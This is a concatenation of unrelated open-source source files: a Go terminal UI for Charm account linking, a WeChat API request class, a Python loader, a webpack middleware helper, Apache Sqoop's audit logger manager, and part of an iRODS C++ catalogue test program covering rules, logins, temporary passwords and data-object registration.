)
// model is the Bubble Tea state for the link flow.
type model struct {
	lh            *linkHandler   // channels bridging the blocking Link call
	cfg           *client.Config // charm client configuration
	cc            *client.Client // set once the client is built
	styles        common.Styles
	code          string // link code supplied by the user
	status        status
	alreadyLinked bool // true if the key was linked before this run
	err           error
	spinner       spinner.Model
	keygen        keygen.Model // only meaningful while status == keygenRunning
}
// newModel builds the initial link model, starting in the
// client-initialization state with a fresh link handler and spinner.
func newModel(cfg *client.Config, code string) model {
	m := model{
		cfg:    cfg,
		code:   code,
		status: initCharmClient,
	}
	m.lh = newLinkHandler()
	m.styles = common.DefaultStyles()
	m.spinner = common.NewSpinner()
	m.alreadyLinked = false
	m.err = nil
	return m
}
// Init starts charm client construction and the spinner tick in parallel.
func (m model) Init() tea.Cmd {
	cmds := []tea.Cmd{
		charmclient.NewClient(m.cfg),
		spinner.Tick,
	}
	return tea.Batch(cmds...)
}
// Update is the state machine for the link flow: it reacts to key presses,
// client/keygen lifecycle messages, and the link-handler messages defined
// above, moving m.status forward and quitting on terminal states.
func (m model) Update(msg tea.Msg) (tea.Model, tea.Cmd) {
	switch msg := msg.(type) {
	case tea.KeyMsg:
		// Any of ctrl+c / esc / q aborts; other keys are ignored.
		switch msg.String() {
		case "ctrl+c", "esc", "q":
			m.status = quitting
			return m, tea.Quit
		default:
			return m, nil
		}
	case charmclient.NewClientMsg:
		// Client ready: kick off the actual link request.
		m.cc = msg
		m.status = linkInit
		return m, handleLinkRequest(m)
	case charmclient.ErrMsg:
		m.err = msg.Err
		return m, tea.Quit
	case charmclient.SSHAuthErrorMsg:
		// First auth failure triggers keygen; a second one is fatal.
		if m.status == initCharmClient {
			m.status = keygenRunning
			m.keygen = keygen.NewModel()
			return m, keygen.GenerateKeys(m.cfg.Host)
		}
		m.err = msg.Err
		return m, tea.Quit
	case keygen.DoneMsg:
		// Keys generated: retry client construction.
		m.status = keygenFinished
		return m, charmclient.NewClient(m.cfg)
	case tokenSentMsg:
		m.status = linkTokenSent
		return m, nil
	case validTokenMsg:
		if msg {
			m.status = linkTokenValid
			return m, nil
		}
		m.status = linkTokenInvalid
		return m, tea.Quit
	case requestDeniedMsg:
		m.status = linkRequestDenied
		return m, tea.Quit
	case successMsg:
		// The bool payload reports whether this key was already linked.
		m.status = linkSuccess
		if msg {
			m.alreadyLinked = true
		}
		return m, tea.Quit
	case timeoutMsg:
		m.status = linkTimeout
		return m, tea.Quit
	case errMsg:
		m.status = linkErr
		return m, tea.Quit
	case spinner.TickMsg:
		var cmd tea.Cmd
		m.spinner, cmd = m.spinner.Update(msg)
		return m, cmd
	default:
		// While keygen runs, forward unknown messages to its sub-model.
		if m.status == keygenRunning {
			newModel, cmd := m.keygen.Update(msg)
			keygenModel, ok := newModel.(keygen.Model)
			if !ok {
				panic("could not perform assertion on keygen model")
			}
			m.keygen = keygenModel
			return m, cmd
		}
		return m, nil
	}
}
// View renders one padded status line for the current state. In-progress
// states append to the spinner prefix (s += ...); terminal states replace it
// (s = ...).
func (m model) View() string {
	if m.err != nil {
		return viewStyle.Render(m.err.Error())
	}
	s := m.spinner.View() + " "
	switch m.status {
	case initCharmClient:
		s += "Initializing..."
	case keygenRunning:
		if m.keygen.Status != keygen.StatusSuccess {
			s += m.keygen.View()
		} else {
			s = m.keygen.View()
		}
	case linkInit:
		s += "Linking..."
	case linkTokenSent:
		s += fmt.Sprintf("Token %s. Waiting for validation...", m.styles.Keyword.Render("sent"))
	case linkTokenValid:
		s += fmt.Sprintf("Token %s. Waiting for authorization...", m.styles.Keyword.Render("valid"))
	case linkTokenInvalid:
		s = fmt.Sprintf("%s token. Goodbye.", m.styles.Keyword.Render("Invalid"))
	case linkRequestDenied:
		s = fmt.Sprintf("Link request %s. Sorry, kid.", m.styles.Keyword.Render("denied"))
	case linkSuccess:
		s = m.styles.Keyword.Render("Linked!")
		if m.alreadyLinked {
			s += " You already linked this key, btw."
		}
	case linkTimeout:
		s = fmt.Sprintf("Link request %s. Sorry.", m.styles.Keyword.Render("timed out"))
	case linkErr:
		s = m.styles.Keyword.Render("Error.")
	case quitting:
		s = "Oh, ok. Bye."
	}
	return viewStyle.Render(s)
}
// handleLinkRequest starts the blocking Link call in a goroutine and returns
// a batch of commands, one listening on each link-handler channel so every
// possible outcome is translated into a tea.Msg.
func handleLinkRequest(m model) tea.Cmd {
	go func() {
		if err := m.cc.Link(m.lh, m.code); err != nil {
			m.lh.err <- err
		}
	}()

	return tea.Batch(
		handleTokenSent(m.lh),
		handleValidToken(m.lh),
		handleRequestDenied(m.lh),
		handleLinkSuccess(m.lh),
		handleTimeout(m.lh),
		handleErr(m.lh),
	)
}
// Each helper below returns a command that blocks on one linkHandler channel
// and converts the received value into the corresponding tea.Msg.

func handleTokenSent(lh *linkHandler) tea.Cmd {
	return func() tea.Msg {
		<-lh.tokenSent
		return tokenSentMsg{}
	}
}

func handleValidToken(lh *linkHandler) tea.Cmd {
	return func() tea.Msg {
		return validTokenMsg(<-lh.validToken)
	}
}

func handleRequestDenied(lh *linkHandler) tea.Cmd {
	return func() tea.Msg {
		<-lh.requestDenied
		return requestDeniedMsg{}
	}
}

func handleLinkSuccess(lh *linkHandler) tea.Cmd {
	return func() tea.Msg {
		return successMsg(<-lh.success)
	}
}

func handleTimeout(lh *linkHandler) tea.Cmd {
	return func() tea.Msg {
		<-lh.timeout
		return timeoutMsg{}
	}
}

func handleErr(lh *linkHandler) tea.Cmd {
	return func() tea.Msg {
		return errMsg{<-lh.err}
	}
}
|
gaigeshen/wechat-mp
|
src/main/java/me/gaigeshen/wechat/mp/shakearound/statistics/PageBasedStatisticsBatchRequest.java
|
package me.gaigeshen.wechat.mp.shakearound.statistics;
import com.alibaba.fastjson.annotation.JSONField;
import lombok.Builder;
import me.gaigeshen.wechat.mp.Request;
/**
* 批量查询页面统计数据
*
* @author gaigeshen
*/
@Builder
public class PageBasedStatisticsBatchRequest implements Request<PageBasedStatisticsBatchResponse> {
  // Query date — presumably a Unix timestamp in seconds; confirm against the
  // WeChat shakearound statistics API docs.
  private long date;
  // Result page index, serialized as "page_index" in the JSON payload.
  @JSONField(name = "page_index")
  private int pageIndex;
  @Override
  public String requestUri() {
    return "https://api.weixin.qq.com/shakearound/statistics/pagelist?access_token=ACCESS_TOKEN";
  }
}
|
dchaplinsky/ragoogle
|
mbu/loader.py
|
from abstract.loaders import FileLoader
class MbuLoader(FileLoader):
    """File loader for kga_gov_ua records kept in mongo.

    Records are deduplicated on (order_date, order_no); the last-updated
    timestamp is read from the record's "order_date" field.
    """

    filetype = "mongo"
    mongo_collection = "kga_gov_ua"
    last_updated_param_is_required = False
    last_updated_path = "order_date"

    @property
    def model(self):
        # Imported lazily to avoid a circular import at module load time.
        from .models import MbuModel

        return MbuModel

    def preprocess(self, record, options):
        # Every dedup field must be present on the incoming record.
        assert set(self.get_dedup_fields()) <= set(record.keys())
        return record

    def get_dedup_fields(self):
        return ["order_date", "order_no"]
|
TwFlem/react-cosmos
|
packages/react-cosmos/src/server/web/webpack/attach-webpack.js
|
// @flow
import path from 'path';
import promisify from 'util.promisify';
import webpackDevMiddleware from 'webpack-dev-middleware';
import webpackHotMiddleware from 'webpack-hot-middleware';
import { getRootUrl } from '../../shared/server';
import enhanceWebpackConfig from './enhance-webpack-config';
import type { Config } from 'react-cosmos-flow/config';
// Compiles the user's webpack config (after Cosmos enhancement), mounts
// webpack-dev-middleware (and hot middleware when enabled) on the Express
// app, and returns a build-done promise plus a teardown function.
export function attachWebpack({
  cosmosConfig,
  app,
  webpack,
  userWebpackConfig
}: {
  cosmosConfig: Config,
  app: express$Application,
  webpack: Function,
  userWebpackConfig: Object
}) {
  const { publicUrl, hot } = cosmosConfig;

  const loaderWebpackConfig = enhanceWebpackConfig({
    webpack,
    userWebpackConfig
  });
  const webpackCompiler = webpack(loaderWebpackConfig);
  webpackCompiler.plugin('invalid', filePath => {
    // Old versions of webpack call this hook without a file path argument
    if (typeof filePath === 'string') {
      const relFilePath = path.relative(process.cwd(), filePath);
      console.log('[Cosmos] webpack build invalidated by', relFilePath);
    }
  });

  // Resolves after the first successful (or failed) compilation pass.
  const onWebpackDone = new Promise(resolve =>
    webpackCompiler.plugin('done', resolve)
  );

  console.log('[Cosmos] Building webpack...');
  const wdmInst = webpackDevMiddleware(webpackCompiler, {
    // publicPath is the base path for the webpack assets and has to match
    // webpack.output.path
    publicPath: getRootUrl(publicUrl),
    logLevel: 'warn'
  });
  app.use(wdmInst);

  if (hot) {
    app.use(webpackHotMiddleware(webpackCompiler));
  }

  // stopWebpack closes the dev middleware (stops file watching).
  function stopWebpack() {
    return promisify(wdmInst.close.bind(wdmInst))();
  }

  return { onWebpackDone, stopWebpack };
}
|
pengan1990/sqoop-on-spark
|
core/src/main/java/org/apache/sqoop/audit/AuditLoggerManager.java
|
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.sqoop.audit;
import org.apache.log4j.Logger;
import org.apache.sqoop.common.MapContext;
import org.apache.sqoop.common.SqoopException;
import org.apache.sqoop.core.Reconfigurable;
import org.apache.sqoop.core.SqoopConfiguration;
import org.apache.sqoop.core.SqoopConfiguration.CoreConfigurationListener;
import org.apache.sqoop.error.code.AuditLoggerError;
import org.apache.sqoop.utils.ClassUtils;
import java.util.ArrayList;
import java.util.List;
import java.util.Map;
/**
 * Singleton registry of {@link AuditLogger} instances. Loggers are discovered
 * from configuration properties under the audit-logger prefix, instantiated by
 * class name, and fanned out to on every {@link #logAuditEvent}. Reconfigurable:
 * a configuration change rebuilds the logger list.
 */
public class AuditLoggerManager implements Reconfigurable {

  /**
   * Logger object for this class
   */
  private static final Logger LOG = Logger.getLogger(AuditLoggerManager.class);

  /**
   * All audit loggers, rebuilt by initializeLoggers()
   */
  private List<AuditLogger> loggers;

  /**
   * Private instance to singleton of this class
   */
  private static AuditLoggerManager instance;

  /**
   * Create default object
   */
  static {
    instance = new AuditLoggerManager();
  }

  /**
   * Return current instance
   *
   * @return Current instance
   */
  public static AuditLoggerManager getInstance() {
    return instance;
  }

  /**
   * Allows to set instance in case that it's need.
   *
   * NOTE(review): this instance method mutates the static singleton field;
   * it should arguably be static, but the signature is kept unchanged for
   * source/binary compatibility with existing callers.
   *
   * @param newInstance New instance
   */
  public void setInstance(AuditLoggerManager newInstance) {
    instance = newInstance;
  }

  public AuditLoggerManager() {
    loggers = new ArrayList<AuditLogger>();
  }

  /**
   * Builds the logger list and subscribes to configuration changes.
   */
  public synchronized void initialize() {
    LOG.info("Begin audit logger manager initialization");
    initializeLoggers();
    SqoopConfiguration.getInstance().getProvider()
        .registerListener(new CoreConfigurationListener(this));
    LOG.info("Audit logger manager initialized: OK");
  }

  /**
   * Clears and repopulates the logger list from configuration. One logger is
   * created per "<name>.<class-suffix>" property; missing or unloadable class
   * names raise AUDIT_0001.
   */
  private void initializeLoggers() {
    loggers.clear();

    MapContext context = SqoopConfiguration.getInstance().getContext();

    Map<String, String> auditLoggerProps = context.getNestedProperties(
        AuditLoggerConstants.PREFIX_AUDITLOGGER_CONFIG);

    // Iterate entries directly rather than keySet()+get() to avoid a second
    // lookup per property.
    for (Map.Entry<String, String> prop : auditLoggerProps.entrySet()) {
      String key = prop.getKey();
      if (!key.endsWith(AuditLoggerConstants.SUFFIX_AUDITLOGGER_CLASS)) {
        continue;
      }

      // Logger name is the property segment before the first dot.
      String loggerName = key.substring(0, key.indexOf("."));
      String loggerClassName = prop.getValue();
      if (loggerClassName == null || loggerClassName.trim().length() == 0) {
        throw new SqoopException(AuditLoggerError.AUDIT_0001,
            "Logger name: " + loggerName);
      }

      Class<?> loggerClass =
          ClassUtils.loadClass(loggerClassName);
      if (loggerClass == null) {
        throw new SqoopException(AuditLoggerError.AUDIT_0001,
            "Logger Class: " + loggerClassName);
      }

      AuditLogger newLogger;
      try {
        newLogger = (AuditLogger) loggerClass.newInstance();
      } catch (Exception ex) {
        // Preserve the instantiation failure as the cause.
        throw new SqoopException(AuditLoggerError.AUDIT_0001,
            "Logger Class: " + loggerClassName, ex);
      }

      newLogger.setLoggerName(loggerName);
      newLogger.initialize();
      loggers.add(newLogger);
      LOG.info("Audit Logger has been initialized: " + loggerName);
    }
  }

  public synchronized void destroy() {
    LOG.trace("Begin audit logger manager destroy");
  }

  /**
   * Fans the audit event out to every configured logger.
   */
  public void logAuditEvent(String username,
      String ip, String operation, String objectType, String objectId) {
    for (AuditLogger logger : loggers) {
      logger.logAuditEvent(username, ip, operation, objectType, objectId);
    }
  }

  @Override
  public void configurationChanged() {
    LOG.info("Begin audit logger manager reconfiguring");
    initializeLoggers();
    LOG.info("Audit logger manager reconfigured");
  }
}
|
iychoi/cyverse-irods
|
iRODS/server/test/src/test_chl.cpp
|
<reponame>iychoi/cyverse-irods
/*** Copyright (c), The Regents of the University of California ***
*** For more information please refer to files in the COPYRIGHT directory ***/
/*
ICAT test program.
*/
#include "rodsClient.h"
#include "parseCommandLine.h"
#include "readServerConfig.hpp"
#include "irods_server_properties.hpp"
#include "checksum.hpp"
#include "rodsUser.h"
#include "icatHighLevelRoutines.hpp"
//#include "icatMidLevelRoutines.hpp"
#include <string.h>
#include <string>
#include <boost/lexical_cast.hpp>
#include <limits>
extern icatSessionStruct *chlGetRcs();
/*
int testCml(rsComm_t *rsComm)
{
return cmlTest(rsComm);
}
*/
/*
 * Exercises chlRegRuleExec: registers a delayed-rule execution entry whose
 * fields (other than the rule name) are fixed placeholder values.
 */
int testRegRule( rsComm_t *rsComm, char *name ) {
    ruleExecSubmitInp_t ruleInfo;
    memset( &ruleInfo, 0, sizeof( ruleInfo ) );
    snprintf( ruleInfo.ruleName, sizeof( ruleInfo.ruleName ), "%s", name );
    snprintf( ruleInfo.reiFilePath, sizeof( ruleInfo.reiFilePath ), "%s", "../config/packedRei/rei.file1" );
    snprintf( ruleInfo.userName, sizeof( ruleInfo.userName ), "%s", "Wayne" );
    snprintf( ruleInfo.exeAddress, sizeof( ruleInfo.exeAddress ), "%s", "Bermuda" );
    snprintf( ruleInfo.exeTime, sizeof( ruleInfo.exeTime ), "%s", "whenEver" );
    snprintf( ruleInfo.exeFrequency, sizeof( ruleInfo.exeFrequency ), "%s", "every 2 days" );
    snprintf( ruleInfo.priority, sizeof( ruleInfo.priority ), "%s", "high" );
    snprintf( ruleInfo.estimateExeTime, sizeof( ruleInfo.estimateExeTime ), "%s", "2 hours" );
    snprintf( ruleInfo.notificationAddr, sizeof( ruleInfo.notificationAddr ), "%s", "<EMAIL>" );
    return chlRegRuleExec( rsComm, &ruleInfo );
}

/*
 * Renames the object with the given ICAT id (decimal string) to newName,
 * acting as a local privileged user; commits only on success.
 */
int testRename( rsComm_t *rsComm, char *id, char *newName ) {
    rodsLong_t intId;
    int status;
    // Run with local admin privileges for both client and proxy users.
    rsComm->clientUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
    rsComm->proxyUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
    intId = strtoll( id, 0, 0 );
    status = chlRenameObject( rsComm, intId, newName );
    if ( status ) {
        return status;
    }
    return chlCommit( rsComm );
}
/*
 * Logs in as the current iRODS user with pw1, then re-attempts login as
 * User (in the local zone) with pw. Returns the status of the last login.
 */
int testLogin( char *User, char *pw, char *pw1, rodsEnv& myEnv ) {
    int status;
    rcComm_t *Conn;
    rErrMsg_t errMsg;
    Conn = rcConnect( myEnv.rodsHost, myEnv.rodsPort, myEnv.rodsUserName,
                      myEnv.rodsZone, 0, &errMsg );
    if ( Conn == NULL ) {
        printf( "rcConnect failure" );
        return -1;
    }
    status = clientLoginWithPassword( Conn, pw1 ); /* first login as self */
    if ( status == 0 ) {
        rstrcpy( Conn->clientUser.userName, User,
                 sizeof Conn->clientUser.userName );
        rstrcpy( Conn->clientUser.rodsZone, myEnv.rodsZone,
                 sizeof Conn->clientUser.rodsZone ); /* default to our zone */
        status = clientLoginWithPassword( Conn, pw ); /* then try other user */
    }
    rcDisconnect( Conn );
    return status;
}

/*
 * Moves object `id` under destination collection `destId` (both decimal
 * id strings) as a local privileged user; commits only on success.
 */
int testMove( rsComm_t *rsComm, char *id, char *destId ) {
    rodsLong_t intId, intDestId;
    int status;
    rsComm->clientUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
    rsComm->proxyUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
    intId = strtoll( id, 0, 0 );
    intDestId = strtoll( destId, 0, 0 );
    status = chlMoveObject( rsComm, intId, intDestId );
    if ( status ) {
        return status;
    }
    return chlCommit( rsComm );
}
/*
 * Requests a temp-password seed for the current user and prints it.
 */
int testTempPw( rsComm_t *rsComm ) {
    int status;
    char pwValueToHash[500];
    status = chlMakeTempPw( rsComm, pwValueToHash, "" );
    printf( "pwValueToHash: %s\n", pwValueToHash );
    return status;
}

/*
 * Derives and prints the temp password from a main password (s1) and a
 * chlGenTempPw seed (s2), without contacting the server.
 */
int testTempPwConvert( char *s1, char *s2 ) {
    char md5Buf[100];
    unsigned char digest[RESPONSE_LEN + 2];
    char digestStr[100];

    /*
       Calculate the temp password: a hash of s1 (the user's main
       password) and s2 (the value returned by chlGenTempPw).
     */
    memset( md5Buf, 0, sizeof( md5Buf ) );
    snprintf( md5Buf, sizeof( md5Buf ), "%s%s", s2, s1 );

    obfMakeOneWayHash( HASH_TYPE_DEFAULT, ( unsigned char* )md5Buf, sizeof md5Buf,
                       digest );

    hashToStr( digest, digestStr );
    printf( "digestStr (derived temp pw)=%s\n", digestStr );
    return 0;
}

/*
 * Prints the local zone name and returns non-zero if it does not match
 * expectedZone.
 */
int
testGetLocalZone( char *expectedZone ) {
    std::string zone;
    chlGetLocalZone( zone );
    printf( "Zone is %s\n", zone.c_str() );
    if ( zone != expectedZone ) {
        return -1;
    }
    return 0;
}
/*
 * Requests a PAM-derived iRODS password for `username` and prints it.
 * Always returns 0, even when chlUpdateIrodsPamPassword fails.
 *
 * NOTE(review): the 100-byte buffer is never freed. Whether free() here is
 * safe depends on whether chlUpdateIrodsPamPassword may repoint the char**
 * argument (in which case freeing the final pointer could be wrong) — verify
 * the callee's contract before fixing the leak.
 */
int
testGetPamPw( rsComm_t *rsComm, char *username, char *testTime ) {
    char *irodsPamPassword;
    irodsPamPassword = ( char* )malloc( 100 );
    memset( irodsPamPassword, 0, 100 );
    int status = chlUpdateIrodsPamPassword( rsComm, username, 0, testTime,
                                            &irodsPamPassword );
    if ( status == 0 ) {
        printf( "status=%d pw=%s \n", status, irodsPamPassword );
    }
    else {
        printf( "status=%d\n", status );
    }
    return 0;
}
/*
 * End-to-end temp-password check for the current user: fetches the seed via
 * chlMakeTempPw, then derives and prints the temp password from it and the
 * main password s1.
 */
int testTempPwCombined( rsComm_t *rsComm, char *s1 ) {
    int status;
    char pwValueToHash[500];
    char md5Buf[100];
    unsigned char digest[RESPONSE_LEN + 2];
    char digestStr[100];

    status = chlMakeTempPw( rsComm, pwValueToHash, "" );
    if ( status ) {
        return status;
    }
    printf( "pwValueToHash: %s\n", pwValueToHash );

    /*
       Calculate the temp password: a hash of s1 (the user's main
       password) and the value returned by chlGenTempPw.
     */
    memset( md5Buf, 0, sizeof( md5Buf ) );
    snprintf( md5Buf, sizeof( md5Buf ), "%s%s", pwValueToHash, s1 );

    obfMakeOneWayHash( HASH_TYPE_DEFAULT, ( unsigned char* )md5Buf, sizeof md5Buf,
                       digest );

    hashToStr( digest, digestStr );
    printf( "digestStr (derived temp pw)=%s\n", digestStr );
    return 0;
}

/*
 * Same as testTempPwCombined, but requests the seed on behalf of another
 * user (requires local admin privileges).
 */
int testTempPwForOther( rsComm_t *rsComm, char *s1, char *otherUser ) {
    int status;
    char pwValueToHash[500];
    char md5Buf[100];
    unsigned char digest[RESPONSE_LEN + 2];
    char digestStr[100];

    rsComm->clientUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
    rsComm->proxyUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;

    status = chlMakeTempPw( rsComm, pwValueToHash, otherUser );
    if ( status ) {
        return status;
    }
    printf( "pwValueToHash: %s\n", pwValueToHash );

    /*
       Calculate the temp password: a hash of s1 (the user's main
       password) and the value returned by chlGenTempPw.
     */
    memset( md5Buf, 0, sizeof( md5Buf ) );
    snprintf( md5Buf, sizeof( md5Buf ), "%s%s", pwValueToHash, s1 );

    obfMakeOneWayHash( HASH_TYPE_DEFAULT, ( unsigned char* )md5Buf, sizeof md5Buf,
                       digest );

    hashToStr( digest, digestStr );
    printf( "digestStr (derived temp pw)=%s\n", digestStr );
    return 0;
}
/*
 * Exercises chlCheckAuth with a pre-determined (challenge, response) pair
 * known to be valid, authenticating testAdminUser#testUserZone while the
 * client identity is testUser. Prints clientPrivLevel on success.
 */
int testCheckAuth( rsComm_t *rsComm, char *testAdminUser, char *testUser,
                   char *testUserZone ) {
    /* Use an pre-determined user, challenge and resp */
    char response[RESPONSE_LEN + 2];
    char challenge[CHALLENGE_LEN + 2];
    int userPrivLevel;
    int clientPrivLevel;
    int status, i;
    char userNameAndZone[NAME_LEN * 2];

    snprintf( rsComm->clientUser.userName, sizeof( rsComm->clientUser.userName ), "%s", testUser );
    snprintf( rsComm->clientUser.rodsZone, sizeof( rsComm->clientUser.rodsZone ), "%s", testUserZone );

    // The canned challenge is all spaces; the response bytes below were
    // captured as a valid answer for it.
    for ( i = 0; i < CHALLENGE_LEN + 2; i++ ) {
        challenge[i] = ' ';
    }

    i = 0;
    response[i++] = 0xd6; /* found to be a valid response */
    response[i++] = 0x8a;
    response[i++] = 0xaf;
    response[i++] = 0xc4;
    response[i++] = 0x83;
    response[i++] = 0x46;
    response[i++] = 0x1b;
    response[i++] = 0xa2;
    response[i++] = 0x5c;
    response[i++] = 0x8c;
    response[i++] = 0x6d;
    response[i++] = 0xc5;
    response[i++] = 0xb1;
    response[i++] = 0x41;
    response[i++] = 0x84;
    response[i++] = 0xeb;
    response[i++] = 0x00;

    // Build "user#zone" for the auth check.
    strncpy( userNameAndZone, testAdminUser, sizeof userNameAndZone );
    userNameAndZone[ sizeof( userNameAndZone ) - 1 ] = '\0'; // JMC cppcheck - dangerous use of strncpy
    strncat( userNameAndZone, "#", sizeof userNameAndZone - strlen( userNameAndZone ) );
    strncat( userNameAndZone, testUserZone, sizeof userNameAndZone - strlen( userNameAndZone ) );

    status = chlCheckAuth( rsComm, 0, challenge, response,
                           userNameAndZone,
                           &userPrivLevel, &clientPrivLevel );
    if ( status == 0 ) {
        printf( "clientPrivLevel=%d\n", clientPrivLevel );
    }
    return status;
}
/*
 * Unregisters one replica of a data object (replica "999999" means all
 * replicas, i.e. replNum = -1). No condInput flags are passed.
 *
 * BUG FIX: the original declared `keyValPair_t *condInput` and then zeroed
 * the POINTER itself with memset(&condInput, 0, sizeof(condInput)), silently
 * passing a null pointer to chlUnregDataObj. The null condInput is now
 * explicit, which is the same runtime behavior without the misleading memset.
 */
int testDelFile( rsComm_t *rsComm, char *name, char *replica ) {
    dataObjInfo_t dataObjInfo;
    memset( &dataObjInfo, 0, sizeof( dataObjInfo ) );
    if ( replica != NULL && *replica != 0 ) {
        int ireplica;
        ireplica = atoi( replica );
        if ( ireplica >= 0 ) {
            dataObjInfo.replNum = ireplica;
        }
        if ( ireplica == 999999 ) {
            dataObjInfo.replNum = -1;
        }
    }
    snprintf( dataObjInfo.objPath, sizeof( dataObjInfo.objPath ), "%s", name );
    keyValPair_t *condInput = NULL; // no extra conditions for this test
    return chlUnregDataObj( rsComm, &dataObjInfo, condInput );
}
/*
 * Unregisters a data object as admin (ADMIN_KW set), optionally matching a
 * specific data id and replica number (default: any replica).
 */
int testDelFilePriv( rsComm_t *rsComm, char *name, char *dataId,
                     char *replica ) {
    dataObjInfo_t dataObjInfo;
    keyValPair_t condInput;
    rsComm->clientUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
    memset( &condInput, 0, sizeof( condInput ) );
    addKeyVal( &condInput, ADMIN_KW, " " );
    memset( &dataObjInfo, 0, sizeof( dataObjInfo ) );
    if ( dataId != NULL && *dataId != 0 ) {
        rodsLong_t idataId;
        idataId = strtoll( dataId, NULL, 0 );
        if ( idataId >= 0 ) {
            dataObjInfo.dataId = idataId;
        }
    }
    dataObjInfo.replNum = -1; // -1 = all/any replica unless overridden below
    if ( replica != NULL && *replica != 0 ) {
        int ireplica;
        ireplica = atoi( replica );
        if ( ireplica >= 0 ) {
            dataObjInfo.replNum = ireplica;
        }
    }
    snprintf( dataObjInfo.objPath, sizeof( dataObjInfo.objPath ), "%s", name );
    return chlUnregDataObj( rsComm, &dataObjInfo, &condInput );
}

/*
 * Unregisters a data object from the trash as admin (ADMIN_RMTRASH_KW set),
 * optionally matching a specific data id; applies to all replicas.
 */
int testDelFileTrash( rsComm_t *rsComm, char *name, char *dataId ) {
    dataObjInfo_t dataObjInfo;
    keyValPair_t condInput;
    rsComm->clientUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
    memset( &condInput, 0, sizeof( condInput ) );
    addKeyVal( &condInput, ADMIN_RMTRASH_KW, " " );
    memset( &dataObjInfo, 0, sizeof( dataObjInfo ) );
    if ( dataId != NULL && *dataId != 0 ) {
        rodsLong_t idataId;
        idataId = strtoll( dataId, NULL, 0 );
        if ( idataId >= 0 ) {
            dataObjInfo.dataId = idataId;
        }
    }
    dataObjInfo.replNum = -1;
    snprintf( dataObjInfo.objPath, sizeof( dataObjInfo.objPath ), "%s", name );
    return chlUnregDataObj( rsComm, &dataObjInfo, &condInput );
}
/*
 * Registers a collection by name.
 *
 * ROBUSTNESS FIX: the original passed collInp with every field except
 * collName uninitialized (stack garbage); zero the struct first, matching
 * the memset pattern used by the other test helpers in this file.
 */
int testRegColl( rsComm_t *rsComm, char *name ) {
    collInfo_t collInp;
    memset( &collInp, 0, sizeof( collInp ) );
    snprintf( collInp.collName, sizeof( collInp.collName ), "%s", name );
    return chlRegColl( rsComm, &collInp );
}

/*
 * Deletes a collection by name (same zero-initialization fix as above).
 */
int testDelColl( rsComm_t *rsComm, char *name ) {
    collInfo_t collInp;
    memset( &collInp, 0, sizeof( collInp ) );
    snprintf( collInp.collName, sizeof( collInp.collName ), "%s", name );
    return chlDelColl( rsComm, &collInp );
}
/*
 * Deletes a rule-exec entry. If userName is given, acts as that ordinary
 * local user; otherwise acts as a local privileged user.
 */
int testDelRule( rsComm_t *rsComm, char *ruleName, char *userName ) {
    if ( userName != NULL && strlen( userName ) > 0 ) {
        rsComm->clientUser.authInfo.authFlag = LOCAL_USER_AUTH;
        rsComm->proxyUser.authInfo.authFlag = LOCAL_USER_AUTH;
        snprintf( rsComm->clientUser.userName, sizeof( rsComm->clientUser.userName ),
                  "%s", userName );
    }
    else {
        rsComm->clientUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
        rsComm->proxyUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
    }
    return chlDelRuleExec( rsComm, ruleName );
}
/*
 * Registers a data object at objPath `name` with the given data type and
 * physical file path. All other fields are fixed test values (replica 1,
 * version "12", size 42, resource "demoResc", replStatus 5).
 */
int testRegDataObj( rsComm_t *rsComm, char *name,
                    char *dataType, char *filePath ) {
    dataObjInfo_t dataObjInfo;
    memset( &dataObjInfo, 0, sizeof( dataObjInfo_t ) );
    snprintf( dataObjInfo.objPath, sizeof( dataObjInfo.objPath ), "%s", name );
    dataObjInfo.replNum = 1;
    snprintf( dataObjInfo.version, sizeof( dataObjInfo.version ), "%s", "12" );
    snprintf( dataObjInfo.dataType, sizeof( dataObjInfo.dataType ), "%s", dataType );
    dataObjInfo.dataSize = 42;
    snprintf( dataObjInfo.rescName, sizeof( dataObjInfo.rescName ), "%s", "demoResc" );
    snprintf( dataObjInfo.filePath, sizeof( dataObjInfo.filePath ), "%s", filePath );
    dataObjInfo.replStatus = 5;
    return chlRegDataObj( rsComm, &dataObjInfo );
}
/*
Do multiple data registrations. If you comment out the commit in
chlRegDataObj and then build this, it can add phony data-objects at
about 8 times the speed of lots of iput's of small files. This can
come in handy for creating simulated large instances for DBMS
performance testing and tuning. In this source file, you might also
want to change rodsLogLevel(LOG_NOTICE) to rodsLogLevel(LOG_ERROR)
and comment out rodsLogSqlReq(1);.
name is the objPath (collection/dataObj)
objPath = /newZone/home/rods/ws/f3"
filePath is the physical path
filePath = "/home/schroeder/iRODS/Vault/home/rods/ws/f3"
Example:
bin/test_chl regmulti 1000 /newZone/home/rods/ws2/f1 generic /tmp/vault/f1
*/
// Register `count` synthetic data objects named nameBase.0 .. nameBase.N-1
// and commit once at the end.  Used to bulk-populate an instance quickly
// for DBMS performance testing (see the comment block above).
// Returns 0 on success, a USER_INPUT_OPTION_ERR for a bad count, or the
// first failing registration's status.
int testRegDataMulti( rsComm_t *rsComm, char *count,
                      char *nameBase, char *dataType, char *filePath ) {
    try {
        const int myCount = boost::lexical_cast<int>( count );
        // boost::lexical_cast<int> already throws (caught below) for values
        // outside the int range, so the old "myCount > INT_MAX" test was
        // dead code; only a non-positive count needs an explicit check.
        if ( myCount <= 0 ) {
            printf( "Invalid input: count\n" );
            return USER_INPUT_OPTION_ERR;
        }
        for ( int i = 0; i < myCount; i++ ) {
            char myName[MAX_NAME_LEN];
            snprintf( myName, sizeof myName, "%s.%d", nameBase, i );
